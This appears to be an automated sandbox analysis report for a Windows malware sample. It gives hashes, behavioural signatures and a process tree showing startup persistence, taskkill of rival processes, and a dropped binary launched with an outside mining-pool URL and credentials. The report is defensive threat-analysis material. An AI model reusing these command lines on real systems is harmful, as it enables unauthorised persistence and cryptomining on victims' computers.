Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
143s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
29/09/2024, 13:21
Static task
static1
Behavioral task
behavioral1
Sample
fe9d34a3640baa4564147b746b74eacc_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
fe9d34a3640baa4564147b746b74eacc_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
fe9d34a3640baa4564147b746b74eacc_JaffaCakes118.exe
-
Size
388KB
-
MD5
fe9d34a3640baa4564147b746b74eacc
-
SHA1
d4474ee31c77d6764c282a0bdfe4603c5c85a076
-
SHA256
47970273eefc3121742df7535363b7f67898d6a2633b04c2b534e20278ac840a
-
SHA512
47eafe81e5ba9c073d12d6de8706ba4ec82eac0c02c19c3fd0554bdca51d9ea702e66775d9786e2fd20a0182f14853e420cb512e8d7dce8eec27467202efcb98
-
SSDEEP
12288:6utrzh9xOXkFK1F9PVjIqYivDNkNwWO5RFg:6utr5OUFeBTvDyiWO5Ru
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation stepx2.exe Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation fe9d34a3640baa4564147b746b74eacc_JaffaCakes118.exe -
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\__tmp_rar_sfx_access_check_240617843 fe9d34a3640baa4564147b746b74eacc_JaffaCakes118.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\stepx2.exe fe9d34a3640baa4564147b746b74eacc_JaffaCakes118.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\stepx2.exe fe9d34a3640baa4564147b746b74eacc_JaffaCakes118.exe -
Executes dropped EXE 3 IoCs
pid Process 4832 stepx2.exe 4368 hid.exe 3616 x30811.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 10 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language stepx2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fe9d34a3640baa4564147b746b74eacc_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language x30811.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language hid.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3060 PING.EXE -
Kills process with taskkill 4 IoCs
pid Process 1536 taskkill.exe 1248 taskkill.exe 2268 taskkill.exe 2296 taskkill.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3060 PING.EXE -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2296 taskkill.exe Token: SeDebugPrivilege 1536 taskkill.exe Token: SeDebugPrivilege 1248 taskkill.exe Token: SeDebugPrivilege 2268 taskkill.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 3664 wrote to memory of 4832 3664 fe9d34a3640baa4564147b746b74eacc_JaffaCakes118.exe 82 PID 3664 wrote to memory of 4832 3664 fe9d34a3640baa4564147b746b74eacc_JaffaCakes118.exe 82 PID 3664 wrote to memory of 4832 3664 fe9d34a3640baa4564147b746b74eacc_JaffaCakes118.exe 82 PID 4832 wrote to memory of 4368 4832 stepx2.exe 83 PID 4832 wrote to memory of 4368 4832 stepx2.exe 83 PID 4832 wrote to memory of 4368 4832 stepx2.exe 83 PID 4368 wrote to memory of 3892 4368 hid.exe 84 PID 4368 wrote to memory of 3892 4368 hid.exe 84 PID 4368 wrote to memory of 3892 4368 hid.exe 84 PID 3892 wrote to memory of 3060 3892 cmd.exe 86 PID 3892 wrote to memory of 3060 3892 cmd.exe 86 PID 3892 wrote to memory of 3060 3892 cmd.exe 86 PID 3892 wrote to memory of 2296 3892 cmd.exe 87 PID 3892 wrote to memory of 2296 3892 cmd.exe 87 PID 3892 wrote to memory of 2296 3892 cmd.exe 87 PID 3892 wrote to memory of 1536 3892 cmd.exe 89 PID 3892 wrote to memory of 1536 3892 cmd.exe 89 PID 3892 wrote to memory of 1536 3892 cmd.exe 89 PID 3892 wrote to memory of 1248 3892 cmd.exe 90 PID 3892 wrote to memory of 1248 3892 cmd.exe 90 PID 3892 wrote to memory of 1248 3892 cmd.exe 90 PID 3892 wrote to memory of 2268 3892 cmd.exe 91 PID 3892 wrote to memory of 2268 3892 cmd.exe 91 PID 3892 wrote to memory of 2268 3892 cmd.exe 91 PID 3892 wrote to memory of 3616 3892 cmd.exe 92 PID 3892 wrote to memory of 3616 3892 cmd.exe 92 PID 3892 wrote to memory of 3616 3892 cmd.exe 92
Processes
-
C:\Users\Admin\AppData\Local\Temp\fe9d34a3640baa4564147b746b74eacc_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\fe9d34a3640baa4564147b746b74eacc_JaffaCakes118.exe"1⤵
- Checks computer location settings
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3664 -
C:\Users\Admin\Start Menu\Programs\Startup\stepx2.exe"C:\Users\Admin\Start Menu\Programs\Startup\stepx2.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4832 -
C:\Users\Admin\AppData\Local\Temp\hid.exe"C:\Users\Admin\AppData\Local\Temp\hid.exe" /NOCONSOLE yz.bat3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4368 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yz.bat4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3892 -
C:\Windows\SysWOW64\PING.EXEping -n 2 127.0.0.15⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3060
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im svchoost.exe5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2296
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mamita.exe5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1536
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im x11811.exe5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1248
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Winlogon2.exe5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2268
-
-
C:\Users\Admin\AppData\Local\Temp\x30811.exex30811.exe -a 60 -g yes -o http://sfx.dload.asia:8332/ -u redem_g -p x1x2x3x4x5 -t 25⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3616
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
43KB
MD53286462b2bc957ff6cada40a2d017745
SHA108346b5b0dee4a29e70f8a138963319343e8ad47
SHA256f95cd8d865244cecbea788b6512fb0c0e55a679348f3759d955406f49e5863bc
SHA512e1d069951cb13bf91e0da17a4f751a248b53d31f49b72cbd8c2bd1085778fbeae1e41518b90fd6e819e946a7bee23ca669579a330a07b524ef05c3501bd508e2
-
Filesize
988KB
MD580adb053ec8e370d72bcb7d22bc43a49
SHA18c8231cab08d034eae9d0a4653b72afb332ca0ba
SHA2560d2b53402d5e65491678e6a7f7b0fc567d9f1d29531ee3a03f3d85c9d972ed48
SHA512703ae0f9025be4b39664a0f8e4b697d04ba1d4e02a95dc858b3f0276cdd1f0802a478a73636824ede11ecfab1c717ab5e25a755f945a11ef0af7a93a3fef12a3
-
Filesize
222B
MD50f876659eb0993516447fab200891274
SHA1d5f1bc306a214a9b5eeea52e7591d6e517354388
SHA2560546b520a146326f206ece905772d8b1244497ddd9659266aff16e68aed8c007
SHA51212d1f829f4538871169a2438817c428521009c1836d07b9c1e9f973598908ba5ef1d2faf29c840a17d2c986f08a1f78adcdd70b57cde72793a1abab55934d9d9
-
Filesize
340KB
MD59047319b255a3d0a74addaa246375c05
SHA19314aa2522e9a4a1100ffcd54b1d457872f2fb8d
SHA256b6ce3088e0f6d71e60188628f678b4665f25d5282c913415fe0fbd3f5dbea37f
SHA51273154dd4c3779014e5e2ea1f531fb311045bdebf29fa5eb32727b321add002b8429e0b80262a1dbea3619fb7765d187e3160d1aafdd6b4009db84f92c560b85d